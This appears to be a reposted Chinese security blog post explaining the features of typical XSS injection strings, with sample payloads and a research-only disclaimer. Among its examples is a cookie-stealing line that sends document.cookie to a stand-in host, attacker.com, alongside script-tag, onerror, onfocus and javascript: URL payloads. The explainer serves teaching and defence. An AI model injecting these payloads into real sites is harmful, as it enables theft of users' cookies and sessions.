典型的XSS(跨站脚本)攻击注入字符串通常包含以下特征:
1、闭合现有标签:攻击者可能会尝试通过插入引号和大于符号(">)来闭合现有的HTML标签,以便开始他们自己的脚本或HTML代码。
2、插入恶意脚本:攻击者可能会插入JavaScript代码,如 alert('XSS') 或者更复杂的脚本,如窃取cookie的脚本 :
document.write('<img src="http://attacker.com/steal?cookie='+document.cookie+'"/>')3、利用事件处理程序:攻击者可能会利用HTML标签的事件处理程序,如onmouseover、onfocus、onclick 等,来触发恶意脚本的执行。例如:
<img src="x" onerror="alert('XSS')">。4、使用动态属性:攻击者可能会利用动态属性,如 javascript: URL,或者使用 eval()、innerHTML 等方法来执行恶意脚本。例如
<a href="javascript:alert('XSS')">Click me</a>5、绕过过滤器:攻击者可能会尝试使用各种技术来绕过输入验证和过滤器,例如使用URL编码、HTML编码、或者利用浏览器解析HTML和JavaScript的特性。
典型的XSS注入字符串的例子:
"><script>alert('XSS');</script>这是一个经典的XSS注入字符串,它试图闭合现有的标签并插入一个恶意的脚本。
<img src="x" onerror="alert('XSS')">这个字符串试图插入一个图像标签,其 src 属性指向一个无效的URL,因此当浏览器尝试加载图像时,会触发 onerror 事件并执行恶意脚本。
<div><input id=x onfocus=alert(document.cookie) tabindex=1></div>这个字符串试图插入一个输入框,当它获得焦点时,会执行恶意脚本。
javascript:alert('XSS')这个字符串试图利用 javascript: URL 来执行恶意脚本。
原文始发于微信公众号(老付话安全):典型的XSS(跨站脚本)攻击注入字符串
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论